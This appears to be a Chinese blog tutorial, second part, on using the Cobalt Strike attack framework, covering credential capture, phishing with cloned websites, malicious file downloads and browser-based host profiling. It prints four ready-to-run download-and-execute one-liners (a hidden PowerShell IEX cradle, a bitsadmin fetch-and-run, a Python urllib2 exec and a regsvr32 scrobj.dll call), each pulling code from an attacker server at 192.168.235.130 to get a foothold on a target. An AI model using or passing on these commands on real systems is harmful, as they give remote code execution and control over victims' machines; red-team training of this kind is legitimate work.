cobaltstrike 常用功能使用(下)

简介: cobaltstrike 常用功能使用

4.6 屏幕截图

640.png

4.7 凭证信息

640.png

5. 钓鱼攻击

640.png

5.1 克隆网站

640.png

5.2 下载文件

选择一个恶意文件直接加载,下载的时候会下载该文件。

640.png

5.3 脚本web传递

5.3.1 powershell

640.png

生成的脚本如下

powershell.exe -nop -w hidden -c "IEX((new-objectnet.webclient).downloadstring('http://192.168.235.130:80/a'))"

直接在目标机器上执行该脚本

640.png

上线

640.png

5.3.2 bitsadmin

640.png

生成的脚本如下所示:

cmd.exe /c bitsadmin /transfer 5cc3 http://192.168.235.130:80/b %APPDATA%\5cc3.exe&%APPDATA%\5cc3.exe&del%APPDATA%\5cc3.exe

在目标机器上执行该脚本

640.png

上线

640.png

5.3.3 Python

640.png

生成的Payload如下:

python -c "import urllib2; exec urllib2.urlopen('http://192.168.235.130:80/c').read();"

在目标服务器上执行该脚本

640.png

5.3.4 Regsrv32

640.png

生成脚本如下:

regsvr32 /s /n /u /i:http://192.168.235.130:80/e scrobj.dll

5.4 信息收集

640.png

640.png

5.4.1 实践

直接访问http://192.168.235.130就可以收集主机相关信息

访问以后,收集到的信息如下所示:

640.png

5.4.2 原理

分析生成网站的源码发现,其在网站源代码里植入了JS脚本,相应脚本如下所示:

640.png

相关文章
|
Java Python
burpsuite安装sqlmap模块---神器合一
今天有点时间,赶紧记录一个坑!哈哈... 都知道burpsuite是web渗透神器,里面不仅模块功能集成好用,而且可以自定义安装扩展模块, 当然牛人也可以自己写一个模块与其对接,这个对于我来说来说目前是望尘莫及 今天要记录的是burp扩展安装sqlmapapi,废话不多说,开始教程 step1.
2047 0
|
4月前
|
Web App开发 JavaScript 前端开发
浏览器内小脚本开发
【8月更文挑战第31天】
97 1
|
7月前
|
网络协议 测试技术 Windows
Switchhosts工具的使用
Switchhosts工具的使用
200 0
|
7月前
|
数据安全/隐私保护
Cobaltstrike系列(一)-- 远程控制
Cobaltstrike系列(一)-- 远程控制
125 0
|
安全 网络协议 Java
|
存储 安全 API
Cobaltstrike4.0——记一次上头的powershell上线分析(二)
Cobaltstrike4.0——记一次上头的powershell上线分析
387 0
|
Unix Linux Shell
功能强大的远程终端神器MobaXterm
功能强大的远程终端神器MobaXterm
951 0
|
IDE API 开发工具
AirtestIDE有哪些好用但是非常隐蔽的小功能?
AirtestIDE有哪些好用但是非常隐蔽的小功能?
330 0
|
Go 数据安全/隐私保护
[工具使用]BurpSuite(上)
[工具使用]BurpSuite
239 0
[工具使用]BurpSuite(上)
|
SQL 安全 数据可视化
[工具使用]BurpSuite(下)
[工具使用]BurpSuite
368 0
[工具使用]BurpSuite(下)

相关课程

更多